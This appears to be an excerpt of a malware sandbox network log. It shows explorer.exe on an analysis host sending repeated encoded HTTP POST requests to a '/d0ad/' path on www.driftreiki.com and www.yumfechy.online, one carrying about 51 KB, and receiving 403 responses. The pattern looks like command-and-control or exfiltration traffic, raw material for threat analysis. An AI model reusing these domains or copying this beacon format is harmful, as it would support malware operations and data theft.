107	192.168.11.20	49952	207.60.131.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:21.128828049 CEST	2206	OUT	POST /d0ad/ HTTP/1.1 Host: www.driftreiki.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.driftreiki.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.driftreiki.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 50 65 35 49 4c 53 4e 33 48 6f 76 6f 34 59 71 61 49 75 34 4a 4f 58 75 6d 4d 6b 53 76 67 6e 31 59 61 63 5a 75 78 76 4b 36 56 54 6d 56 34 4e 4e 72 6d 79 73 58 73 31 79 4f 32 76 48 54 6d 45 4e 6c 30 74 34 73 35 2d 66 4e 52 35 7e 31 6e 63 53 37 28 50 61 5a 75 30 54 73 63 62 6f 43 53 63 72 32 42 33 6b 30 45 5f 4a 65 72 57 5a 53 54 34 72 45 53 71 55 52 75 48 6d 51 50 79 7e 6f 71 49 28 6d 62 6e 49 74 6e 4e 7a 72 73 70 43 65 54 74 4e 4e 64 2d 49 43 75 4d 37 50 43 44 55 72 7a 35 6e 69 71 52 53 50 6d 44 41 73 4a 36 28 5f 31 65 6b 69 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=Pe5ILSN3Hovo4YqaIu4JOXumMkSvgn1YacZuxvK6VTmV4NNrmysXs1yO2vHTmENl0t4s5-fNR5~1ncS7(PaZu0TscboCScr2B3k0E_JerWZST4rESqURuHmQPy~oqI(mbnItnNzrspCeTtNNd-ICuM7PCDUrz5niqRSPmDAsJ6(_1ekiDQ).
Oct 26, 2022 13:21:21.308692932 CEST	2206	IN	HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Wed, 26 Oct 2022 11:21:20 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	192.168.11.20	49953	207.60.131.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:23.331255913 CEST	2208	OUT	POST /d0ad/ HTTP/1.1 Host: www.driftreiki.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.driftreiki.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.driftreiki.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 50 65 35 49 4c 53 4e 33 48 6f 76 6f 34 34 61 61 4c 50 34 4a 47 58 75 6c 44 45 53 76 37 58 31 63 61 63 64 75 78 74 6e 6e 56 67 43 56 34 6f 78 72 6e 78 30 58 74 31 79 4f 69 5f 48 57 72 6b 4e 75 30 74 6b 53 35 2d 54 4e 52 34 61 31 6e 76 61 37 76 76 61 65 67 55 54 76 62 62 6f 44 44 4d 72 77 42 33 6f 6f 45 2d 74 65 7e 32 39 53 53 39 33 45 44 4f 41 53 28 58 6e 56 48 53 7e 6e 39 59 28 6f 62 6e 4d 50 6e 4d 37 52 73 37 65 65 54 4e 74 4e 63 2d 49 42 6b 38 37 49 4d 54 56 4b 67 36 4b 50 67 52 69 57 77 51 49 49 57 62 43 6a 28 74 42 70 64 56 37 37 42 41 39 6a 52 71 69 30 48 70 31 42 43 74 61 6e 42 44 76 7a 31 2d 6f 49 6d 33 61 69 32 77 76 31 34 6c 65 62 38 31 45 55 66 35 6b 4e 4a 37 4f 63 6f 53 39 48 51 76 7a 48 35 35 41 4b 4f 4e 46 7a 67 33 56 65 79 38 6f 79 4f 52 7a 65 72 6d 50 63 44 46 68 4b 48 47 41 43 7a 2d 58 43 30 55 75 4b 72 63 65 30 51 45 28 6f 44 73 71 37 6b 7a 6c 6b 33 6c 39 46 6b 34 77 4c 56 65 31 64 65 79 79 32 38 48 6d 78 4e 71 37 59 76 4a 31 44 34 49 6a 4e 52 74 34 4e 54 30 79 78 37 31 63 72 55 45 49 66 54 36 7e 73 53 35 65 31 72 61 47 6d 6e 73 65 41 36 77 4c 5a 37 71 66 42 28 62 63 59 43 32 49 73 56 4e 78 6c 72 6e 59 59 38 78 63 53 4f 59 7e 6a 6f 76 62 78 34 36 49 36 37 72 6e 43 73 48 63 70 32 74 4b 37 72 70 6f 43 53 6a 57 79 4a 5f 36 6c 53 46 37 74 76 44 38 47 70 6f 50 56 6a 47 48 45 74 42 61 6b 30 53 48 35 47 6b 43 58 43 67 4f 51 47 54 64 32 52 33 7e 31 79 63 59 39 78 2d 63 30 6c 41 48 54 4a 54 69 54 49 4e 55 4e 70 65 71 74 67 34 47 41 5a 4a 71 54 58 61 31 62 38 51 65 31 77 4c 30 62 78 31 39 41 71 38 61 6e 4a 56 7a 57 74 34 51 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=Pe5ILSN3Hovo44aaLP4JGXulDESv7X1cacduxtnnVgCV4oxrnx0Xt1yOi_HWrkNu0tkS5-TNR4a1nva7vvaegUTvbboDDMrwB3ooE-te~29SS93EDOAS(XnVHS~n9Y(obnMPnM7Rs7eeTNtNc-IBk87IMTVKg6KPgRiWwQIIWbCj(tBpdV77BA9jRqi0Hp1BCtanBDvz1-oIm3ai2wv14leb81EUf5kNJ7OcoS9HQvzH55AKONFzg3Vey8oyORzermPcDFhKHGACz-XC0UuKrce0QE(oDsq7kzlk3l9Fk4wLVe1deyy28HmxNq7YvJ1D4IjNRt4NT0yx71crUEIfT6~sS5e1raGmnseA6wLZ7qfB(bcYC2IsVNxlrnYY8xcSOY~jovbx46I67rnCsHcp2tK7rpoCSjWyJ_6lSF7tvD8GpoPVjGHEtBak0SH5GkCXCgOQGTd2R3~1ycY9x-c0lAHTJTiTINUNpeqtg4GAZJqTXa1b8Qe1wL0bx19Aq8anJVzWt4Q.
Oct 26, 2022 13:21:23.510648966 CEST	2208	IN	HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Wed, 26 Oct 2022 11:21:22 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	192.168.11.20	49954	207.60.131.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:25.532049894 CEST	2211	OUT	POST /d0ad/ HTTP/1.1 Host: www.driftreiki.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.driftreiki.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.driftreiki.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 50 65 35 49 4c 53 4e 33 48 6f 76 6f 34 34 61 61 4c 50 34 4a 47 58 75 6c 44 45 53 76 37 58 31 63 61 63 64 75 78 74 6e 6e 56 67 4b 56 34 2d 46 72 6c 51 30 58 28 46 79 4f 39 50 48 58 72 6b 4e 7a 30 74 38 65 35 2d 75 32 52 37 79 31 6e 2d 4b 37 76 36 47 65 77 45 54 75 56 37 6f 42 53 63 72 6b 42 33 6b 47 45 2d 4a 4f 72 53 39 53 54 36 7a 45 53 4a 38 52 6a 58 6d 51 48 53 7e 64 75 49 7e 43 62 6e 41 45 6e 4d 33 52 73 35 61 65 53 5f 6c 4e 61 74 67 42 70 4d 37 4c 4b 6a 56 42 33 71 4b 6d 67 52 6d 6f 77 51 49 79 57 5a 75 6a 28 75 4a 70 63 57 44 38 42 67 39 6a 63 4b 69 33 4b 4d 74 4e 43 73 32 42 42 44 62 7a 31 38 6f 49 6e 58 61 69 39 31 62 79 73 56 65 5a 78 56 45 44 62 35 6f 46 4a 37 61 69 6f 54 4a 48 51 65 54 48 6a 71 59 4b 4c 73 46 7a 6a 58 56 63 76 73 6f 62 48 78 7a 61 72 6d 66 71 44 47 34 33 48 42 34 43 79 62 6a 43 69 41 36 46 76 38 66 5f 63 6b 7e 67 48 73 57 5f 6b 7a 31 4f 33 6c 39 56 6b 36 63 4c 55 75 6c 64 52 51 57 78 73 6e 6d 79 47 4b 37 4e 35 35 35 4e 34 49 28 46 52 75 35 49 54 79 53 78 70 46 63 72 45 7a 38 59 49 36 28 6b 65 5a 66 71 6c 36 47 78 6e 73 69 71 36 78 50 6a 37 37 7a 42 28 72 4d 59 56 32 49 76 52 74 78 66 68 48 59 65 34 78 63 53 4f 59 79 64 6f 76 66 78 34 72 77 36 70 73 6a 43 39 32 63 70 30 74 4b 39 72 70 6f 70 53 6a 62 43 4a 5f 6a 76 53 46 72 58 76 42 51 47 70 35 66 56 6b 45 76 48 6d 52 61 62 77 53 48 49 49 45 50 42 43 67 43 49 47 54 4e 41 52 41 4f 31 38 39 6b 39 37 65 63 33 7a 51 48 71 42 7a 6a 53 4d 49 4d 5a 70 65 6d 58 67 34 62 4e 5a 4a 43 54 62 5f 77 68 67 52 75 72 6d 36 30 78 34 6c 64 52 70 36 53 4b 62 6b 6e 2d 76 75 51 49 72 79 51 54 46 4d 4c 71 6c 42 57 5f 51 31 79 48 38 53 77 79 5a 30 49 76 43 79 61 61 74 6a 57 53 76 63 4c 58 73 51 79 74 53 45 54 6d 4a 39 66 6c 4e 69 6e 54 31 59 44 2d 6b 6c 65 6d 4a 68 4b 66 61 6d 78 35 53 77 31 47 42 67 6b 66 36 45 37 78 70 59 73 58 6a 63 50 59 44 53 6d 53 30 51 71 59 4c 39 33 49 7e 31 75 69 4c 79 31 5f 32 48 67 6a 59 72 71 78 4c 36 63 56 42 4d 75 41 50 6f 6a 69 61 55 42 5f 52 77 6c 72 6f 49 56 49 47 49 31 34 54 54 4b 58 49 4e 43 6d 42 6e 6a 34 67 6d 55 32 67 67 71 6b 5a 35 69 7a 57 72 57 57 7e 76 49 76 70 63 34 71 63 62 43 54 65 76 32 44 62 67 54 50 68 74 49 54 6d 55 50 6d 4c 38 57 77 38 42 5a 4b 47 37 37 54 56 37 77 55 67 52 78 71 6f 4d 6b 4f 51 4f 4f 67 44 6f 76 47 6a 5f 4b 73 65 4a 61 4b 47 67 41 6b 6a 74 78 51 4a 72 62 4b 63 57 42 67 39 77 6d 7a 64 41 32 73 5a 42 62 33 39 45 57 73 4b 51 28 37 50 32 4c 38 55 63 41 74 46 4f 6e 49 4e 76 32 48 58 6f 35 32 53 45 67 6f 6e 6d 54 6e 6e 66 77 64 65 62 6c 77 58 61 62 70 4f 6d 75 73 68 6e 4c 35 64 31 59 46 45 34 6a 6d 68 6e 62 64 71 36 4c 2d 51 5a 57 59 66 38 63 42 4e 4e 50 46 77 57 31 44 58 6e 57 39 6b 64 7a 37 51 68 35 43 54 50 64 69 42 31 55 39 4d 4f 71 37 30 39 4c 39 6f 77 71 43 30 6a 31 4d 56 53 72 62 56 47 4f 51 71 6b 36 35 53 56 51 44 38 54 78 36 42 32 58 69 32 69 34 5f 42 2d 49 38 53 4d 79 6e 56 6c 47 6a 57 69 37 5f 52 59 6a 6f 63 32 6e 79 4a 77 34 63 6e 67 48 68 32 6b 33 49 32 43 33 30 63 6e 30 71 4a 5a 4d 5f 30 61 39 77 6d 36 62 6b 79 52 77 61 6a 6e 4c 64 58 4f 44 54 31 6d 54 66 54 67 75 4c 65 6c 28 4b 6e 2d 36 44 38 4c 41 4e 67 64 41 54 65 72 28 49 34 30 63 78 35 76 64 55 42 61 6e 43 30 2d 6d 72 31 73 36 5a 35 68 4c 35 6e 4c 4a 57 46 31 57 34 70 7a 38 44 75 6b 53 4e 6a 38 7e 56 4c 39 4b 58 72 4a 55 31 67 75 38 49 4b 6c 51 76 72 45 78 74 43 6c 39 51 66 64 49 42 48 51 32 37 45 54 42 57 59 38 38 52 6b 49 69 46 53 34 52 57 67 39 52 44 69 39 74 78 6e 65 55 4c 7e 43 79 68 67 71 62 36 6a 62 74 31 33 44 65 46 4e 49 64 30 32 4a 6d 77 63 5f 52 47 6b 5f 36 66 36 6e 57 5a 4e 77 54 57 65 51 53 48 56 63 76 39 52 51 66 2d 55 6c 7a 34 32 4d 53 6f 66 41 71 68 54 62 61 35 55 30 65 41 66 48 32 79 32 5f 6b 32 68 6c 74 76 76 6f 68 30 42 46 43 35 37 6b 49 4f 67 42 35 39 70 72 4f 49 74 31 48 70 76 4a 76 71 74 36 6c 61 58 4a 42 56 59 44 69 44 35 76 58 5f 31 46 75 2d 76 6a 43 33 63 66 42 38 50 38 56 4e 4d 5f 5a 74 6c 6d 64 49 74 6d 43 71 62 4e 4a 72 58 77 6a 67 58 4e 39 77 36 64 69 6a 57 70 71 5f 4d 55 6f 71 70 6a 33 63 35 53 36 79 32 2d 30 50 30 61 39 33 69 73 67 44 55 74 6b 53 56 73 30 42 52 34 4f 43 61 6e 73 30 50 4a 38 Data Ascii: jXu=Pe5ILSN3Hovo44aaLP4JGXulDESv7X1cacduxtnnVgKV4-FrlQ0X(FyO9PHXrkNz0t8e5-u2R7y1n-K7v6GewETuV7oBScrkB3kGE-JOrS9ST6zESJ8RjXmQHS~duI~CbnAEnM3Rs5aeS_lNatgBpM7LKjVB3qKmgRmowQIyWZuj(uJpcWD8Bg9jcKi3KMtNCs2BBDbz18oInXai91bysVeZxVEDb5oFJ7aioTJHQeTHjqYKLsFzjXVcvsobHxzarmfqDG43HB4CybjCiA6Fv8f_ck~gHsW_kz1O3l9Vk6cLUuldRQWxsnmyGK7N555N4I(FRu5ITySxpFcrEz8YI6(keZfql6Gxnsiq6xPj77zB(rMYV2IvRtxfhHYe4xcSOYydovfx4rw6psjC92cp0tK9rpopSjbCJ_jvSFrXvBQGp5fVkEvHmRabwSHIIEPBCgCIGTNARAO189k97ec3zQHqBzjSMIMZpemXg4bNZJCTb_whgRurm60x4ldRp6SKbkn-vuQIryQTFMLqlBW_Q1yH8SwyZ0IvCyaatjWSvcLXsQytSETmJ9flNinT1YD-klemJhKfamx5Sw1GBgkf6E7xpYsXjcPYDSmS0QqYL93I~1uiLy1_2HgjYrqxL6cVBMuAPojiaUB_RwlroIVIGI14TTKXINCmBnj4gmU2ggqkZ5izWrWW~vIvpc4qcbCTev2DbgTPhtITmUPmL8Ww8BZKG77TV7wUgRxqoMkOQOOgDovGj_KseJaKGgAkjtxQJrbKcWBg9wmzdA2sZBb39EWsKQ(7P2L8UcAtFOnINv2HXo52SEgonmTnnfwdeblwXabpOmushnL5d1YFE4jmhnbdq6L-QZWYf8cBNNPFwW1DXnW9kdz7Qh5CTPdiB1U9MOq709L9owqC0j1MVSrbVGOQqk65SVQD8Tx6B2Xi2i4_B-I8SMynVlGjWi7_RYjoc2nyJw4cngHh2k3I2C30cn0qJZM_0a9wm6bkyRwajnLdXODT1mTfTguLel(Kn-6D8LANgdATer(I40cx5vdUBanC0-mr1s6Z5hL5nLJWF1W4pz8DukSNj8~VL9KXrJU1gu8IKlQvrExtCl9QfdIBHQ27ETBWY88RkIiFS4RWg9RDi9txneUL~Cyhgqb6jbt13DeFNId02Jmwc_RGk_6f6nWZNwTWeQSHVcv9RQf-Ulz42MSofAqhTba5U0eAfH2y2_k2hltvvoh0BFC57kIOgB59prOIt1HpvJvqt6laXJBVYDiD5vX_1Fu-vjC3cfB8P8VNM_ZtlmdItmCqbNJrXwjgXN9w6dijWpq_MUoqpj3c5S6y2-0P0a93isgDUtkSVs0BR4OCans0PJ8EabXZWjKwlel2YXVMZGpC28RVNQLrtRhcqmeludj1YeJ2voON7UpKUgJMvSYPA8lj(sAsRSw9yOwkFEQX8znRu3l83u(BWFCjkJ8RVaIce8RNVsHvjRSocVHP97hCj_dBDx2XBsBYF6LC2S1YMW3gBtX_eD6gcJqkCs4XDuCuhdykJoK9SMgQuoNK26zGjQp_DaFG7xiI(VlnCERgzSeFQozzinYnMtMBVEEY~YFkJCJgbJ4Q2BGI3D56cKSFNoQhhIVew1o37Urw0eXzK8u0yo2hBft3Ut~x1U2ml41hJ5Cb9Th6ygGYutCUYGGjpnAfv18zR_o7MCFbrTgT(VVPIpkQrpwfJJ7EesaGxKCBsexSVCmT3CqhlK96aLoGE5Vx2TFvPxGWjg5mwI5VWCSZ(-Q3EfgF~3Ql0aQvoRzSdsdnH96jYsJSOAPf(qi6n-1kyZv8VS(7lJX9c2M4iJsM5gc3~a3Lg7E7Anw2HfSYPZL4wot5ywvGs4YJf9H5GxKa879wui3sdfOPckjBdvRUjEI4iR4nWrHUomtrvNlrZtMpOO29d8UqpPtt~HI_yV0My2ofTRinQ0zAVXKWpxVt1JrgdWBkYpmJJRvXScAxJ8530WeFGjIV2CfoYEppwctLOk5pr9PpQwlzYZJ6TmJReG5K0It1lbCdzG1bSk71SWsVFb~zJhGv9gjtjg(4LJIF(LCDTgrB0wfoNIfU3pntGPZUApzIBqmyJI~QILYQBByOUmtrB4qmmnFCkfpIzfLk3A1-cC2GAPYXHoUSvpB-LHJkFLM7DHhfJFYaQnyQ
Oct 26, 2022 13:21:25.532084942 CEST	2216	OUT	Data Raw: 53 76 39 31 69 71 43 66 78 44 55 52 6d 79 50 75 6a 70 6e 47 41 67 43 66 45 65 38 75 33 50 5a 55 4d 56 75 70 79 48 78 47 52 54 77 77 28 66 41 7a 72 4b 37 71 45 45 42 51 56 62 4b 78 73 31 4c 62 78 72 49 56 74 54 77 43 32 6e 45 4b 71 38 76 50 39 5f Data Ascii: Sv91iqCfxDURmyPujpnGAgCfEe8u3PZUMVupyHxGRTww(fAzrK7qEEBQVbKxs1LbxrIVtTwC2nEKq8vP9_gjpiuA~k68dN~X0anlSNz4YgaTIGw1JUuahGTdmEEwxTF_NDYctgihWim_0z(KULtgugHQVPHZoc0M(UZmXLlJORNxa3oL28vUR1JwBBx9hVfap6m16wCIIaNTZg8cJi(gduPP57CQ5e1tqmzlLm9DN1FsQLAjWEY
Oct 26, 2022 13:21:25.532130957 CEST	2221	OUT	Data Raw: 68 50 6d 30 38 37 34 32 70 56 32 47 79 71 31 72 48 6a 5a 57 74 33 54 68 44 34 47 36 70 56 79 35 49 70 31 35 74 66 65 35 57 2d 47 6a 73 35 61 6b 69 51 45 4a 54 31 36 73 41 34 66 30 54 6d 6b 75 47 33 6c 42 7a 72 32 49 74 4c 59 2d 63 69 34 51 67 77 Data Ascii: hPm08742pV2Gyq1rHjZWt3ThD4G6pVy5Ip15tfe5W-Gjs5akiQEJT16sA4f0TmkuG3lBzr2ItLY-ci4QgwR7goQYa66M2ptB8SdGCU7N7DDBdzd0Mcdkvbarn1X0fd~ho3gtIOfytHwkG0uecD35cavaFZhe3SYfSanCsmZXtGM6NSdWI-Xewans6tIxFNqjwLGsMyW_3n2hsAyyPWxektT5Bzn7wBLP1YCZ9MLdJ_ko856p6CI
Oct 26, 2022 13:21:25.709146023 CEST	2221	IN	HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Wed, 26 Oct 2022 11:21:25 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 26, 2022 13:21:25.709270954 CEST	2226	OUT	Data Raw: 63 65 32 63 5a 4f 73 41 4e 42 51 72 71 46 37 4e 39 6b 62 45 43 32 63 51 44 77 37 68 6a 66 30 54 36 2d 61 38 4a 4d 67 4d 35 51 74 43 35 76 65 49 72 67 57 4a 7e 42 71 71 56 50 72 68 58 59 4e 35 76 79 38 56 48 51 6d 51 48 36 64 6f 42 56 59 37 59 59 Data Ascii: ce2cZOsANBQrqF7N9kbEC2cQDw7hjf0T6-a8JMgM5QtC5veIrgWJ~BqqVPrhXYN5vy8VHQmQH6doBVY7YYcqpMAPfbC1rDVIcbRll0VHNKc8RCPNQV3UlJfGYoyWL52NW5EqxcDl7_zZHZcwJg1w3ZtioWMN7gSsjU6DI88hfjIMHJn8dJvSNlT_zTMWlPD7VGnQt-cDrU8oN-vY9R~NCTgx9rAjrKj10xFyoZztLsNdyl5HlDt
Oct 26, 2022 13:21:25.709358931 CEST	2231	OUT	Data Raw: 66 48 51 56 67 66 28 78 37 64 76 4e 43 76 43 57 6d 45 57 55 41 78 73 30 63 62 67 42 52 50 7e 72 77 63 4e 33 48 32 61 77 54 76 71 58 64 64 62 56 7a 54 52 76 39 52 59 78 4b 59 72 6d 28 72 45 72 51 53 6d 62 65 49 6d 39 78 53 46 53 7a 65 6f 34 78 59 Data Ascii: fHQVgf(x7dvNCvCWmEWUAxs0cbgBRP~rwcN3H2awTvqXddbVzTRv9RYxKYrm(rErQSmbeIm9xSFSzeo4xY7VEtFj5BAKF1Kfgi2_GKcsmRffVvN5s9TqEuN5b5Df8LhxNlps78a39oerZGFiGPXQIPdm(3oX9DpO2xA-LcGIvtdLIGYSWdVpay0oi3VqoyHxL0fQNMQxdKrGqMd2IQTqoBlJjdgHLfMkDYqWgoahCRWSm35ur0p
Oct 26, 2022 13:21:25.709359884 CEST	2234	OUT	Data Raw: 32 6c 34 45 43 2d 62 68 37 66 45 54 52 4c 67 64 4d 31 47 37 53 6f 56 44 46 5a 47 6b 28 44 75 66 45 47 33 7a 63 64 52 57 43 43 45 4f 47 34 67 77 52 67 59 55 79 6f 6d 42 78 79 45 35 44 6e 38 64 50 78 57 76 6b 67 53 66 37 43 67 50 33 50 47 6b 66 69 Data Ascii: 2l4EC-bh7fETRLgdM1G7SoVDFZGk(DufEG3zcdRWCCEOG4gwRgYUyomBxyE5Dn8dPxWvkgSf7CgP3PGkfiAkJOyBAIdSmbnQygZ_T-lF0SFF0bD5ObMtMMc7UpZ4LeZGIZAWUtj3yr7MIMUYQOdotY~LSL79icRfhPTWtrTu6Vlr~nZl(ZAFpIL9AQtoQRlv18Qmt-1rfd8b4yrYGdQpQALTZldIsgy7noBALvKewOwQ5FDS~GZ
Oct 26, 2022 13:21:25.709614038 CEST	2235	OUT	Data Raw: 56 4f 4a 65 68 76 59 77 50 64 4d 36 48 34 4f 48 44 70 4a 34 69 41 52 74 39 33 34 5a 32 5f 66 6e 35 37 79 4f 42 68 73 78 47 5f 49 42 7e 62 48 42 63 71 77 64 35 30 39 35 6e 64 76 48 54 70 58 4c 28 49 59 4c 38 74 32 7a 53 62 62 38 4f 54 71 71 39 58 Data Ascii: VOJehvYwPdM6H4OHDpJ4iARt934Z2_fn57yOBhsxG_IB~bHBcqwd5095ndvHTpXL(IYL8t2zSbb8OTqq9Xe1XENpVqRP5DpKmKserZPBDoqDknAM4f6lgnNAcJEwjas05onx41apcXAYVsyy0idVcSyxNgXh(CpHMiv1(hJd3iLc6GbPd-5nlG53x-klm-NMIhhcTpRndRw2zLWDJsRjQZPBMkwgJi5frYdqCUldQaAS(PREX8e
Oct 26, 2022 13:21:25.709793091 CEST	2247	OUT	Data Raw: 48 34 7e 32 4c 67 37 6b 69 63 30 50 73 77 43 53 30 5a 6f 55 6a 6c 32 4b 6e 32 74 51 43 5a 76 45 34 47 28 68 53 56 72 4d 66 69 30 63 36 6a 6e 6b 72 73 41 6d 55 56 50 77 70 7a 70 70 59 53 6d 31 6c 32 38 36 37 4c 73 6e 38 72 6b 62 6a 58 48 57 56 77 Data Ascii: H4~2Lg7kic0PswCS0ZoUjl2Kn2tQCZvE4G(hSVrMfi0c6jnkrsAmUVPwpzppYSm1l2867Lsn8rkbjXHWVw6oxfmeFpdj~KoiTDG7oVGQsm3lu_fEV9Ul759F0VujmUrFU4ZPs1xsQt7FGqxSCMeHiUDC9Q24gvtNPgncRUKVK-ivss3tnkKZaNISzPGSatfffAVwB8~HtZY010daz6SZDQkeF6lDX13bMfkyAowTskJwFrNE010
Oct 26, 2022 13:21:25.886710882 CEST	2249	OUT	Data Raw: 71 41 68 43 59 34 50 45 61 4a 39 68 47 52 4b 53 63 53 75 4c 47 4e 71 65 4e 68 63 33 6b 37 70 38 64 61 7a 5f 42 73 4c 33 52 4a 41 72 63 78 71 46 41 6a 4e 30 75 34 4c 47 43 2d 49 71 74 4e 28 75 49 56 69 79 6f 36 33 34 67 71 6e 4c 66 73 66 65 53 30 Data Ascii: qAhCY4PEaJ9hGRKScSuLGNqeNhc3k7p8daz_BsL3RJArcxqFAjN0u4LGC-IqtN(uIViyo634gqnLfsfeS0zFtMIUVZ973D9luAnrI_LnLxfxjrJnnsVb~xwWAHGgSaWpzlQl85ehT_Fk4duXa7VgOqzgfB0zigl53jsCYCRkN1xpoKYWUeMpTUc69INgK3F8R07TnQRTYc8xYW~z8LckK5j4l4139l316G7PboJ3YVW8BKD1iof
Oct 26, 2022 13:21:25.886821032 CEST	2260	OUT	Data Raw: 73 4d 6f 70 37 37 74 52 31 46 73 30 4a 79 53 4b 75 67 7a 7a 49 5a 38 56 4b 44 63 35 61 44 45 73 65 30 4b 6a 37 72 37 54 41 55 30 42 78 36 64 63 41 55 34 74 50 68 37 73 30 5a 36 47 52 5f 47 30 64 6f 59 59 6f 4b 70 53 7e 45 4b 43 58 53 63 4c 62 79 Data Ascii: sMop77tR1Fs0JySKugzzIZ8VKDc5aDEse0Kj7r7TAU0Bx6dcAU4tPh7s0Z6GR_G0doYYoKpS~EKCXScLbyfJ~BYMgnCflXo6Nh3EfqR8PoGDodoaUahyuaac4YpaY7RmDlAz4GCbugnL9wufsLkCgerkVzfbrMTatuPt8xqVG-z6AIKQcv5ui6SUSTM6uykd1EYrGJdKlP9l(4gLq7(jijL55NLo2YN0Jzv2ImOl9SkBnEEOdto

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	49855	162.0.238.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:14.407136917 CEST	449	OUT	POST /d0ad/ HTTP/1.1 Host: www.yumfechy.online Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.yumfechy.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yumfechy.online/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 71 71 4a 4b 6e 6e 72 32 4f 37 72 63 56 48 4c 41 30 57 4d 68 63 56 6d 6e 53 62 77 64 63 32 64 4b 5a 49 39 54 4c 34 34 69 4e 30 68 37 50 76 67 70 4a 58 71 54 71 39 6e 50 48 5a 61 44 66 34 32 39 78 75 63 48 4b 66 52 32 6f 35 48 73 58 43 54 38 6b 77 52 31 34 5f 59 36 77 6c 42 54 72 4c 75 5f 71 52 32 64 51 45 54 68 76 69 4a 74 38 39 51 77 54 58 7a 7a 6b 65 59 76 4a 38 6e 78 39 63 78 4d 75 32 4f 6a 78 56 45 52 71 75 62 65 31 56 63 56 6a 39 52 48 33 50 61 6b 32 7a 72 51 51 34 43 4a 6c 42 68 58 58 44 45 6e 68 48 6f 76 41 30 30 52 62 73 75 6b 46 2d 67 76 6b 35 37 53 31 4c 34 36 6c 65 59 51 39 39 4a 61 52 6f 69 42 4b 59 45 34 6c 7a 31 57 59 6f 76 79 74 71 33 51 7e 47 75 4d 55 6a 7a 75 7a 2d 49 35 47 5f 61 5a 6e 6f 28 53 32 6f 6d 44 69 4a 28 36 4e 55 72 47 65 74 78 67 41 4b 79 71 70 63 77 74 55 74 73 78 6e 68 52 33 56 37 66 33 43 58 73 6a 6a 39 61 4b 59 58 4b 6d 36 6b 49 6d 31 4b 54 4e 37 65 76 4a 4a 64 74 6d 47 5f 65 4b 65 62 38 38 6e 74 36 79 32 39 33 63 44 68 65 76 4c 54 42 56 54 63 4f 30 38 67 76 42 41 44 4d 72 53 2d 47 4c 52 77 4e 58 7a 6e 38 52 4f 5f 44 61 59 6e 64 68 62 6d 34 6b 66 57 52 2d 36 70 33 35 73 37 4f 73 6d 37 37 43 62 78 30 52 67 6e 44 55 44 4d 50 32 37 37 4f 30 44 48 6e 4e 4c 50 4d 46 72 52 64 39 71 52 38 31 58 6f 67 77 28 32 59 64 61 6a 68 63 79 33 6b 4e 68 42 36 75 74 32 6b 34 31 31 42 33 63 61 36 75 6a 64 51 48 34 41 4e 54 36 4f 32 49 34 6c 55 54 77 38 53 65 51 44 55 34 79 55 43 39 67 32 4b 7a 5a 42 6d 4e 59 64 5a 67 6e 61 43 62 58 75 30 49 53 6d 4e 46 7a 37 6e 31 62 62 45 6e 46 35 72 53 55 6c 6a 48 57 48 78 69 46 6d 30 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=qqJKnnr2O7rcVHLA0WMhcVmnSbwdc2dKZI9TL44iN0h7PvgpJXqTq9nPHZaDf429xucHKfR2o5HsXCT8kwR14_Y6wlBTrLu_qR2dQEThviJt89QwTXzzkeYvJ8nx9cxMu2OjxVERqube1VcVj9RH3Pak2zrQQ4CJlBhXXDEnhHovA00RbsukF-gvk57S1L46leYQ99JaRoiBKYE4lz1WYovytq3Q~GuMUjzuz-I5G_aZno(S2omDiJ(6NUrGetxgAKyqpcwtUtsxnhR3V7f3CXsjj9aKYXKm6kIm1KTN7evJJdtmG_eKeb88nt6y293cDhevLTBVTcO08gvBADMrS-GLRwNXzn8RO_DaYndhbm4kfWR-6p35s7Osm77Cbx0RgnDUDMP277O0DHnNLPMFrRd9qR81Xogw(2Ydajhcy3kNhB6ut2k411B3ca6ujdQH4ANT6O2I4lUTw8SeQDU4yUC9g2KzZBmNYdZgnaCbXu0ISmNFz7n1bbEnF5rSUljHWHxiFm0.
